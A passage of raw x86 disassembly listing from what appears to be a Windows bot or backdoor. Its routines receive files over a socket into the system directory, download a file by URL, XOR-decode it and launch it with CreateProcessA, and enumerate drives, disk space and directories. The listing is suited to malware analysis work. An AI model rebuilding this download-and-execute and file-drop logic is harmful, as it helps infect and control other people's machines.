call sub_415D38
cmp edi, esi
pop ecx
jbe short loc_416506
push edi
call dword_4CBA6C ; closesocket
loc_416506: ; CODE XREF: sub_4161C1+33C�j
push [ebp+var_1F8]
call dword_4CBA6C ; closesocket
push [ebp+var_58]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_416522: ; CODE XREF: sub_4161C1+2AF�j
; sub_4161C1+2BA�j
push esi
mov esi, offset dword_438010
push [ebp+var_54]
lea eax, [ebp+var_DC]
push esi
push eax
push [ebp+var_1FC]
call sub_409869
push esi
call sub_415D38
add esp, 18h
push [ebp+var_1F8]
call dword_4CBA6C ; closesocket
push [ebp+var_58]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
sub_4161C1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416563 proc near ; DATA XREF: sub_401ACD+798�o
var_14C4 = byte ptr -14C4h
var_4C4 = byte ptr -4C4h
var_2C4 = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 14C4h
call sub_41C500
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1C0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [ebp+var_8], ebx
mov [eax+1B0h], esi
lea eax, [ebp+var_2C4]
push 104h
push eax
call ds:dword_42707C ; GetSystemDirectoryA
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_2C4]
push offset aSS ; "%s%s"
push eax
call sub_41C266
add esp, 10h
lea eax, [ebp+var_2C4]
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
push eax
call ds:dword_4270F8 ; CreateFileA
cmp eax, 0FFFFFFFFh
jnz short loc_4165ED
push offset unk_43818C
jmp short loc_416633
; ---------------------------------------------------------------------------
loc_4165ED: ; CODE XREF: sub_416563+81�j
push eax
call ds:dword_427070 ; CloseHandle
lea eax, [ebp+var_2C4]
push offset aAB ; "a+b"
push eax
call sub_41BEA2
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_416615
push offset unk_43815C
jmp short loc_416633
; ---------------------------------------------------------------------------
loc_416615: ; CODE XREF: sub_416563+A9�j
push [ebp+var_20]
lea eax, [ebp+var_1B8]
push eax
call sub_415F7A
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+arg_0], eax
jnz short loc_416646
push offset unk_43813C
loc_416633: ; CODE XREF: sub_416563+88�j
; sub_416563+B0�j
lea eax, [ebp+var_4C4]
push eax
call sub_41C266
pop ecx
pop ecx
jmp loc_416742
; ---------------------------------------------------------------------------
loc_416646: ; CODE XREF: sub_416563+C9�j
mov esi, 1000h
loc_41664B: ; CODE XREF: sub_416563+14E�j
push esi
lea eax, [ebp+var_14C4]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_14C4]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_4CB9EC ; recv
mov edi, eax
cmp edi, ebx
jz loc_416712
cmp edi, 0FFFFFFFFh
jz short loc_4166B3
push [ebp+var_4]
lea eax, [ebp+var_14C4]
push edi
push 1
push eax
call sub_41DB54
add [ebp+var_8], edi
add esp, 10h
push [ebp+var_8]
call dword_4CB9D0 ; htonl
mov [ebp+var_C], eax
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
jmp short loc_41664B
; ---------------------------------------------------------------------------
loc_4166B3: ; CODE XREF: sub_416563+118�j
lea eax, [ebp+var_4C4]
push offset dword_438010
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_409869
lea eax, [ebp+var_4C4]
push eax
call sub_415D38
push [ebp+var_4]
call sub_41BA3B
add esp, 24h
push [ebp+arg_0]
call dword_4CBA6C ; closesocket
push [ebp+var_1C]
call sub_40B6D6
pop ecx
push 1
call ds:dword_4270D4 ; ExitThread
loc_416712: ; CODE XREF: sub_416563+10F�j
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_4C4]
push offset unk_438110
push eax
call sub_41C266
add esp, 14h
loc_416742: ; CODE XREF: sub_416563+DE�j
cmp [ebp+var_14], ebx
jnz short loc_416767
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_409869
add esp, 14h
loc_416767: ; CODE XREF: sub_416563+1E2�j
lea eax, [ebp+var_4C4]
push eax
call sub_415D38
cmp [ebp+var_4], ebx
pop ecx
jz short loc_416782
push [ebp+var_4]
call sub_41BA3B
pop ecx
loc_416782: ; CODE XREF: sub_416563+214�j
cmp [ebp+arg_0], ebx
jbe short loc_416790
push [ebp+arg_0]
call dword_4CBA6C ; closesocket
loc_416790: ; CODE XREF: sub_416563+222�j
push [ebp+var_1C]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
sub_416563 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167A0 proc near ; DATA XREF: sub_401ACD+619B�o
; sub_401ACD+69D9�o
var_590 = qword ptr -590h
var_584 = qword ptr -584h
var_510 = byte ptr -510h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_2E4 = dword ptr -2E4h
var_2E0 = word ptr -2E0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_148 = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+var_2CC]
push 1
rep movsd
pop edi
xor esi, esi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push dword_4CB984
call dword_4CB8D8 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_416C2C
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_148]
push 40000000h
push eax
call ds:dword_4270F8 ; CreateFileA
cmp eax, edi
mov [ebp+var_20], eax
jnb short loc_416867
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset unk_438358
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_41684A
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409869
add esp, 14h
loc_41684A: ; CODE XREF: sub_4167A0+88�j
lea eax, [ebp+var_510]
push eax
call sub_415D38
push [ebp+var_48]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_416867: ; CODE XREF: sub_4167A0+68�j
xor edi, edi
call ds:dword_4270B0 ; GetTickCount
mov ebx, 7D000h
mov dword ptr [ebp+var_8+4], eax
push ebx
call sub_41BEB5
pop ecx
mov [ebp+var_1C], eax
loc_416881: ; CODE XREF: sub_4167A0+1B4�j
push 200h
lea eax, [ebp+var_510]
push esi
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_510]
push 200h
push eax
push [ebp+var_18]
call dword_4CB8E0 ; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_4168C5
push [ebp+arg_0]
lea eax, [ebp+var_510]
push eax
call sub_416C92
pop ecx
pop ecx
loc_4168C5: ; CODE XREF: sub_4167A0+112�j
lea eax, [ebp+var_24]
push esi
push eax
lea eax, [ebp+var_510]
push [ebp+arg_0]
push eax
push [ebp+var_20]
call ds:dword_4270F0 ; WriteFile
cmp edi, ebx
jnb short loc_416903
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_4168ED
mov eax, [ebp+arg_0]
loc_4168ED: ; CODE XREF: sub_4167A0+148�j
push eax
lea eax, [ebp+var_510]
push eax
mov eax, [ebp+var_1C]
add eax, edi
push eax
call sub_41CD20
add esp, 0Ch
loc_416903: ; CODE XREF: sub_4167A0+13F�j
add edi, [ebp+arg_0]
cmp [ebp+var_3C], esi
jz short loc_416910
cmp edi, [ebp+var_3C]
ja short loc_41695A
loc_416910: ; CODE XREF: sub_4167A0+169�j
cmp [ebp+var_44], 1
mov eax, edi
jz short loc_41692A
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_438330
jmp short loc_41693A
; ---------------------------------------------------------------------------
loc_41692A: ; CODE XREF: sub_4167A0+176�j
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_438308
loc_41693A: ; CODE XREF: sub_4167A0+188�j
mov eax, [ebp+var_48]
imul eax, 234h
add eax, offset dword_43E710
push eax
call sub_41C266
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_416881
loc_41695A: ; CODE XREF: sub_4167A0+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_4169AF
cmp edi, [ebp+var_3C]
jz short loc_4169AF
push [ebp+var_3C]
lea eax, [ebp+var_510]
mov [ebp+var_14], esi
push edi
push offset unk_4382DC
push eax
call sub_41C266
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409869
lea eax, [ebp+var_510]
push eax
call sub_415D38
add esp, 28h
loc_4169AF: ; CODE XREF: sub_4167A0+1C4�j
; sub_4167A0+1C9�j
call ds:dword_4270B0 ; GetTickCount
sub eax, dword ptr [ebp+var_8+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_20]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call ds:dword_427070 ; CloseHandle
push [ebp+var_1C]
call sub_41BA91
cmp [ebp+var_38], esi
pop ecx
jz short loc_416A39
lea eax, [ebp+var_148]
push eax
call sub_4010AB
cmp eax, [ebp+var_38]
pop ecx
jz short loc_416A39
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+var_510]
push offset unk_4382B4
push eax
call sub_41C266
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409869
lea eax, [ebp+var_510]
push eax
call sub_415D38
add esp, 28h
loc_416A39: ; CODE XREF: sub_4167A0+241�j
; sub_4167A0+253�j
cmp [ebp+var_14], esi
jz loc_416C79
cmp [ebp+var_44], 1
jz loc_416B34
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_427690
lea eax, [ebp+var_148]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul ds:dbl_427690
fstp [esp+590h+var_590]
push offset unk_43827C
push eax
call sub_41C266
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_416AB4
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409869
add esp, 14h
loc_416AB4: ; CODE XREF: sub_4167A0+2F2�j
lea eax, [ebp+var_510]
push eax
call sub_415D38
cmp [ebp+var_40], 1
pop ecx
jnz loc_416C79
push 5
push esi
lea eax, [ebp+var_148]
push esi
push eax
push offset aOpen ; "open"
push esi
call dword_4CB940
cmp [ebp+var_30], esi
jnz loc_416C79
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset dword_438260
push eax
call sub_41C266
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409869
lea eax, [ebp+var_510]
push eax
call sub_415D38
add esp, 24h
jmp loc_416C79
; ---------------------------------------------------------------------------
loc_416B34: ; CODE XREF: sub_4167A0+2A6�j
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_427690
lea eax, [ebp+var_148]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul ds:dbl_427690
fstp [esp+590h+var_590]
push offset unk_43821C
push eax
call sub_41C266
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_416B9C
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409869
add esp, 14h
loc_416B9C: ; CODE XREF: sub_4167A0+3DA�j
lea eax, [ebp+var_510]
push eax
call sub_415D38
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_41BF70
push 44h
lea eax, [ebp+var_310]
pop edi
push edi
push esi
push eax
call sub_41BF70
add esp, 1Ch
mov [ebp+var_310], edi
lea eax, [ebp+var_10]
mov [ebp+var_304], offset byte_43DB88
push 1
mov [ebp+var_2E0], si
pop edi
push eax
lea eax, [ebp+var_310]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+var_148]
push esi
push eax
push esi
mov [ebp+var_2E4], edi
call ds:dword_427074 ; CreateProcessA
cmp eax, edi
jnz short loc_416C1E
call dword_4CB92C ; WSACleanup
call sub_4188A6
push esi
call ds:dword_42706C ; ExitProcess
loc_416C1E: ; CODE XREF: sub_4167A0+46A�j
lea eax, [ebp+var_148]
push eax
push offset unk_4381E8
jmp short loc_416C38
; ---------------------------------------------------------------------------
loc_416C2C: ; CODE XREF: sub_4167A0+45�j
lea eax, [ebp+var_248]
push eax
push offset unk_4381BC
loc_416C38: ; CODE XREF: sub_4167A0+48A�j
lea eax, [ebp+var_510]
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_416C6C
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_409869
add esp, 14h
loc_416C6C: ; CODE XREF: sub_4167A0+4AA�j
lea eax, [ebp+var_510]
push eax
call sub_415D38
pop ecx
loc_416C79: ; CODE XREF: sub_4167A0+29C�j
; sub_4167A0+325�j ...
push [ebp+var_18]
call dword_4CBA08 ; InternetCloseHandle
push [ebp+var_48]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
sub_4167A0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416C92 proc near ; CODE XREF: sub_4167A0+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_416CAE
loc_416C9E: ; CODE XREF: sub_416C92+1A�j
mov dl, byte_429094
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_416C9E
locret_416CAE: ; CODE XREF: sub_416C92+A�j
retn
sub_416C92 endp
; =============== S U B R O U T I N E =======================================
sub_416CAF proc near ; CODE XREF: sub_401ACD+5761�p
; sub_401ACD+5896�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_41DC5E
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_416CAF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416CC9 proc near ; CODE XREF: sub_41036B+458�p
; sub_41036B+5FD�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_4D35F8
push 0
push edi
call sub_41BF70
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_416CEE: ; CODE XREF: sub_416CC9+5B�j
; sub_416CC9+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_41DD20
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_41DCB0
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_416D2C
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_416CEE
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_416CEE
; ---------------------------------------------------------------------------
loc_416D2C: ; CODE XREF: sub_416CC9+4B�j
dec esi
mov eax, edi
loc_416D2F: ; CODE XREF: sub_416CC9+73�j
lea ecx, [ebp+var_38]
cmp esi, ecx
jb short loc_416D3E
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_416D2F
; ---------------------------------------------------------------------------
loc_416D3E: ; CODE XREF: sub_416CC9+6B�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_416CC9 endp
; =============== S U B R O U T I N E =======================================
sub_416D48 proc near ; CODE XREF: sub_416EFD+51�p
; sub_416EFD+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4CBA34 ; GetDriveTypeA
sub eax, 0
jz short loc_416D8B
dec eax
jz short loc_416D85
dec eax
dec eax
jz short loc_416D7F
dec eax
jz short loc_416D79
dec eax
jz short loc_416D73
dec eax
jz short loc_416D6D
mov eax, offset word_4383AC
retn
; ---------------------------------------------------------------------------
loc_416D6D: ; CODE XREF: sub_416D48+1D�j
mov eax, offset off_4383A8
retn
; ---------------------------------------------------------------------------
loc_416D73: ; CODE XREF: sub_416D48+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_416D79: ; CODE XREF: sub_416D48+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_416D7F: ; CODE XREF: sub_416D48+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_416D85: ; CODE XREF: sub_416D48+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_416D8B: ; CODE XREF: sub_416D48+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_416D48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D91 proc near ; CODE XREF: sub_416DD9+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_4CB8C4
test eax, eax
jz short loc_416DC6
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_416DC6: ; CODE XREF: sub_416D91+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_416D91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416DD9 proc near ; CODE XREF: sub_416EFD+17�p
; sub_41AF8F+1F3�p
var_198 = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_416D91
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_416EB7
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_416EB7
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_416EB7
push ebx
mov ebx, 400h
push 0
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_41DDA0
push edx
push eax
call sub_416CC9
pop ecx
mov edi, offset aSkb ; "%sKB"
pop ecx
mov esi, 80h
push eax
push edi
lea eax, [ebp+var_198]
push esi
push eax
call sub_41C360
add esp, 10h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_41DDA0
push edx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
push edi
lea eax, [ebp+var_118]
push esi
push eax
call sub_41C360
add esp, 10h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_41DDA0
push edx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
push edi
lea eax, [ebp+var_98]
push esi
push eax
call sub_41C360
add esp, 10h
pop ebx
jmp short loc_416EE9
; ---------------------------------------------------------------------------
loc_416EB7: ; CODE XREF: sub_416DD9+2C�j
; sub_416DD9+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_198]
push esi
push eax
call sub_41C266
pop ecx
lea eax, [ebp+var_118]
pop ecx
push esi
push eax
call sub_41C266
pop ecx
lea eax, [ebp+var_98]
pop ecx
push esi
push eax
call sub_41C266
pop ecx
pop ecx
loc_416EE9: ; CODE XREF: sub_416DD9+DC�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_198]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_416DD9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416EFD proc near ; CODE XREF: sub_416FCF+17�p
; sub_416FCF+60�p
var_500 = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_416DD9
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+var_80]
push offset aFailed ; "failed"
rep movsd
push eax
call sub_41CA50
add esp, 10h
test eax, eax
jnz short loc_416F70
push ebx
push ebx
call sub_416D48
pop ecx
push eax
push offset unk_4383FC
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41C360
add esp, 14h
jmp short loc_416FA4
; ---------------------------------------------------------------------------
loc_416F70: ; CODE XREF: sub_416EFD+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_416D48
pop ecx
push eax
push offset unk_4383C0
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41C360
add esp, 20h
loc_416FA4: ; CODE XREF: sub_416EFD+71�j
push 1
lea eax, [ebp+var_500]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
lea eax, [ebp+var_500]
push eax
call sub_415D38
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_416EFD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416FCF proc near ; CODE XREF: sub_401ACD+252E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_416FF0
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416EFD
add esp, 10h
jmp short loc_417051
; ---------------------------------------------------------------------------
loc_416FF0: ; CODE XREF: sub_416FCF+9�j
push esi
push edi
push ebx
push ebx
call dword_4CB93C ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_41BEB5
pop ecx
mov edi, eax
push edi
push esi
call dword_4CB93C ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_417048
loc_417014: ; CODE XREF: sub_416FCF+77�j
push offset aA_1 ; "A:\\"
push esi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_417037
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416EFD
add esp, 10h
loc_417037: ; CODE XREF: sub_416FCF+54�j
push esi
call sub_41B9C0
cmp [esi+eax+1], bl
lea esi, [esi+eax+1]
pop ecx
jnz short loc_417014
loc_417048: ; CODE XREF: sub_416FCF+43�j
push edi
call sub_41BA91
pop ecx
pop edi
pop esi
loc_417051: ; CODE XREF: sub_416FCF+1F�j
pop ebx
pop ebp
retn
sub_416FCF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417054 proc near ; DATA XREF: sub_401ACD+67C1�o
var_49C = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = byte ptr -218h
var_115 = byte ptr -115h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0A7h
mov esi, eax
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
push eax
call sub_41B9C0
xor ebx, ebx
cmp [ebp+eax+var_115], 5Ch
pop ecx
jnz short loc_4170A9
lea eax, [ebp+var_114]
push eax
call sub_41B9C0
pop ecx
mov [ebp+eax+var_115], bl
loc_4170A9: ; CODE XREF: sub_417054+3F�j
lea eax, [ebp+var_218]
push eax
push offset unk_43845C
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_41C360
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_4170EE
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_409869
add esp, 14h
loc_4170EE: ; CODE XREF: sub_417054+78�j
lea eax, [ebp+var_114]
push ebx
push eax
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
push [ebp+var_29C]
call sub_41716F
add esp, 18h
push eax
lea eax, [ebp+var_49C]
push offset dword_43843C
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_41714F
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_409869
add esp, 14h
loc_41714F: ; CODE XREF: sub_417054+D9�j
lea eax, [ebp+var_49C]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_417054 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41716F proc near ; CODE XREF: sub_417054+B9�p
; sub_41716F+9E�p
var_54C = byte ptr -54Ch
var_34C = byte ptr -34Ch
var_248 = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
mov esi, 104h
push [ebp+arg_10]
lea eax, [ebp+var_248]
push offset aS_3 ; "%s\\*"
push esi
push eax
call sub_41C360
mov edi, ds:dword_427124
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset aSS_0 ; "%s\\%s"
jz short loc_41722C
loc_4171BB: ; CODE XREF: sub_41716F+BB�j
test [ebp+var_144], 10h
jz short loc_417218
cmp [ebp+var_118], 2Eh
jnz short loc_4171DF
cmp [ebp+var_117], 0
jz short loc_417218
cmp [ebp+var_117], 2Eh
jz short loc_417218
